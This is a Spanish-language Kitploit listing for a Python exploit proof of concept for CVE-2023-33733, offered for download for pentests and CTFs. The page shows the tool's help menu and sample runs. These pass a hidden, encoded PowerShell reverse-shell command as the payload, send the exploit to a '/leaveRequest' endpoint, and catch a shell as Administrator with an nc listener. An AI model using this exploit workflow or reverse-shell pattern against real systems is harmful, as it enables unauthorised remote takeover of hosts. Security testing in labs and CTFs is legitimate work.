Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-33733-Exploit-PoC — Script de explotación en Python para CVE-2023-33733 dirigido a aplicaciones web. Automatiza la autenticación, extracción de sesión y entrega de reverse shell para pruebas de penetración y entornos CTF. | Kitploit
Herramientas/GitHubGitHub/l41kaa/cve-2023-33733-exploit-poc
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebCTFPruebas de Penetración
GitHubl41kaa/cve-2023-33733-exploit-poc

CVE-2023-33733-Exploit-PoC

Script de explotación en Python para CVE-2023-33733 dirigido a aplicaciones web. Automatiza la autenticación, extracción de sesión y entrega de reverse shell para pruebas de penetración y entornos CTF.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
31hace 2 añosAún no revisado

CVE-2023-33733-POC

Aviso

No descubrí ni me atribuyo el mérito de encontrar esta vulnerabilidad. Este es simplemente un script que construí para explotar más fácilmente esta vulnerabilidad para un CTF. Para la información original, consulte: https://github.com/c53elyas/CVE-2023-33733

Este script está pensado simplemente como un script rápido en Python3 para explotar CVE-2023-33733. Necesitará proporcionar el host, puerto, comando y una cookie de sesión válida.

Menú de ayuda

root@kitploit:~
kali@kali:~/Desktop$ python3 exp.py --help 
usage: foothold.py [-h] --host HOST --port PORT --cmd CMD --session SESSION

options:
  -h, --help            show this help message and exit
  --host HOST
  --port PORT, -p PORT
  --cmd CMD, -c CMD
  --username USERNAME, -u USERNAME
  --password PASSWORD, -ps PASSWORD
  --session SESSION, --cookie SESSION, -sc SESSION
                        Session cookie

Uso

root@kitploit:~
kali@kali:~/Desktop$ python3 exp.py --host "vuln.server" --port 80 --cmd "powershell -nop -w hidden -e <su código de revshell aquí>" --username "<su nombre de usuario aquí>" --password "<su contraseña aquí>"
[*] Iniciando sesión en http://vuln.server:80
Cookie de sesión recuperada: SESSION=...
[*] Extrayendo token de sesión...
[*] Token extraído:  .abc.xyz
[*] Construyendo exploit...
[*] Exploit construido
[*] Preparando solicitud
[*] Enviando solicitud a http://vuln.server:80/leaveRequest
[*] Enviar una reverse shell debería hacer que la solicitud se cuelgue
[*] Solicitud enviada
[*] Éxito probable. Código de estado 504


kali@kali:~/Desktop$ python3 exp.py --host "vuln.server" --port 80 --cmd "powershell -nop -w hidden -e <su código de revshell aquí>" --session "<su cookie aquí>"
[*] Construyendo exploit...
[*] Exploit construido
[*] Preparando solicitud
[*] Enviando solicitud a http://vuln.server:80/leaveRequest
[*] Enviar una reverse shell debería hacer que la solicitud se cuelgue
[*] Solicitud enviada
[*] Éxito probable. Código de estado 500


# Listener
kali@kali:~/Desktop$ nc -lnvp 9001
connect to [10.10.10.2] from (UNKNOWN) [10.10.10.1] 50246
whoami
Administrator
Descargar herramienta